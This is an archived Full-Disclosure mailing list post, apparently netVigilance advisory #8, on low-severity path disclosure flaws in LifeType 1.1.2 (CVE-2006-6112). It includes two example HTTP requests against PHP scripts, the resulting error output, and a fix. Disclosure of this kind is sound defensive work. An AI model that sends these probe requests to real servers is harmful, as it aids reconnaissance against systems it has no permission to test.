Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] LifeType version 1.1.2 Multiple Path Disclosure Vulner

from [Jesper Jurcenoks] Network Security [Permanent Link]
Subject: [Full-disclosure] LifeType version 1.1.2 Multiple Path Disclosure Vulnerabilities
Date: Thu, 30 Nov 2006 12:06:42 -0800 
netVigilance Security Advisory #8

LifeType version 1.1.2 Multiple Path Disclosure Vulnerabilities 

Description:
LifeType is a Blogging platform built with PHP, designed with maximum
customizability, speed and ease of use in mind. Due to program flaws it
is possible for the remote attacker to disclose the true path of the
server-side script.

External References: 
Mitre CVE: CVE-2006-6112
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6112 
NVD NIST: CVE-2006-6112
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-6112 
OSVDB: 30685 30686

Summary: 
LifeType is a blogging platform built with PHP, designed with maximum
customizability, speed and ease of use in mind. 
A security problem in the product allows attackers to gather the true
path of the server-side script. 

Release Date:

Severity:
Risk: Low
 
CVSS Metrics
Access Vector: Remote
Access Complexity: Low
Authentication: not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.3
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Officical Fix
Report Confidence: Confirmed
 
Vulnerability Impact: Attack
Host Impact: Path disclosure.

SecureScout Testcase ID:
TC 17938


Vulnerable Systems:
Lifetype version 1.1.2

Vulnerability Type:
Program flaw - The bayesianfilter.class.php and bootstrap.php scripts
has flaws which lead to a Warning or even Fatal Errors.

Vendor Status: 
The Vendor has been notified. LifeType has released an immediate patch,
Soon to be released version 1.1.3 and above solves the problem. 
Also see vendors release here :
http://www.lifetype.net/blog.php/lifetype-development-journal/2006/11/30
/full_path_disclosure_vulnerability_in_lifetype_1.0.x_and_1.1.x 
To download latest version goto
 
http://www.lifetype.net/blog.php/lifetype-development-journal/page/downl
oads 
Workaround:
Disable warning messages: modify in the php.ini file following line:
display_errors = Off.
Or modify .htaccess file (this will work only for the apache servers). 
Example: 
HTTP REQUEST http://[TARGET]/[lifetype-directory]/class/bootstrap.php 
REPLY
...
<!--error--><br />
<b>Notice</b>:  Use of undefined constant PLOG_CLASS_PATH - assumed
'PLOG_CLASS_PATH' in <b>[FULL PATH TO FILE]bootstrap.php</b> on line
<b>24</b><br />
<br />
<b>Warning</b>:  main(PLOG_CLASS_PATHclass/object/exception.class.php):
failed to open stream: No such file or directory in <b>[FULL PATH TO
FILE]bootstrap.php</b> on line <b>24</b><br />
<!--error--><br />
<b>Warning</b>:  main(): Failed opening
'PLOG_CLASS_PATHclass/object/exception.class.php' for inclusion
(include_path='.;/usr/local/php/PEAR') in <b>[FULL PATH TO
FILE]bootstrap.php</b> on line <b>24</b><br />
<br />
<b>Notice</b>:  Use of undefined constant PLOG_CLASS_PATH - assumed
'PLOG_CLASS_PATH' in <b[FULL PATH TO FILE]bootstrap.php</b> on line
<b>27</b><br />
<br />
<b>Warning</b>:  main(PLOG_CLASS_PATHclass/misc/info.class.php): failed
to open stream: No such file or directory in <b>[FULL PATH TO
FILE]bootstrap.php</b> on line <b>27</b><br />
<br />
<b>Warning</b>:  main(): Failed opening
'PLOG_CLASS_PATHclass/misc/info.class.php' for inclusion
(include_path='.;/usr/local/php/PEAR') in <b>[FULL PATH TO
FILE]bootstrap.php</b> on line <b>27</b><br />
... 

OR

HTTP REQUEST
http://[TARGET]/[lifetype-directory]/class/security/bayesianfilter.class
.php 
REPLY
...
REPLY
<!--error--><br />
<b>Notice</b>:  Use of undefined constant PLOG_CLASS_PATH - assumed
'PLOG_CLASS_PATH' in <b>[FULL PATH TO FILE]bayesianfilter.class.php</b>
on line <b>3</b><br />
<br />
<b>Warning</b>:
main(PLOG_CLASS_PATHclass/security/pipelinefilter.class.php): failed to
open stream: No such file or directory in <b>[FULL PATH TO
FILE]bayesianfilter.class.php</b> on line <b>3</b><br />
<br />
<b>Warning</b>:  main(): Failed opening
'PLOG_CLASS_PATHclass/security/pipelinefilter.class.php' for inclusion
(include_path='.;/usr/local/php/PEAR') in <b>[FULL PATH TO
FILE]bayesianfilter.class.php</b> on line <b>3</b><br />
<br />
<b>Notice</b>:  Use of undefined constant PLOG_CLASS_PATH - assumed
'PLOG_CLASS_PATH' in <b>[FULL PATH TO FILE]bayesianfilter.class.php</b>
on line <b>4</b><br />
<br />
<b>Warning</b>:  main(PLOG_CLASS_PATHclass/net/client.class.php): failed
to open stream: No such file or directory in <b>[FULL PATH TO
FILE]bayesianfilter.class.php</b> on line <b>4</b><br />
<br />
<b>Warning</b>:  main(): Failed opening
'PLOG_CLASS_PATHclass/net/client.class.php' for inclusion
(include_path='.;/usr/local/php/PEAR') in <b>[FULL PATH TO
FILE]bayesianfilter.class.php</b> on line <b>4</b><br />
<br />
<b>Fatal error</b>:  Class bayesianfilter:  Cannot inherit from
undefined class pipelinefilter in <b>[FULL PATH TO
FILE]bayesianfilter.class.php</b> on line <b>29</b><br />
...

URL of Original Advisory: http://www.netvigilance.com/advisory0008  

Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] LifeType version 1.1.2 Multiple Path Disclosure Vulnerabilities, Jesper Jurcenoks <=
Previous by Date:  [Full-disclosure] Secunia Research: MailEnable IMAP Service Two Vulnerabilities, Secunia Research
Next by Date:  [Full-disclosure] [USN-390-1] evince vulnerability, Kees Cook
Previous by Thread:  [Full-disclosure] Secunia Research: MailEnable IMAP Service Two Vulnerabilities, Secunia Research
Next by Thread:  [Full-disclosure] [USN-390-1] evince vulnerability, Kees Cook
Indexes:  [Date] [Thread] [Top] [All Lists]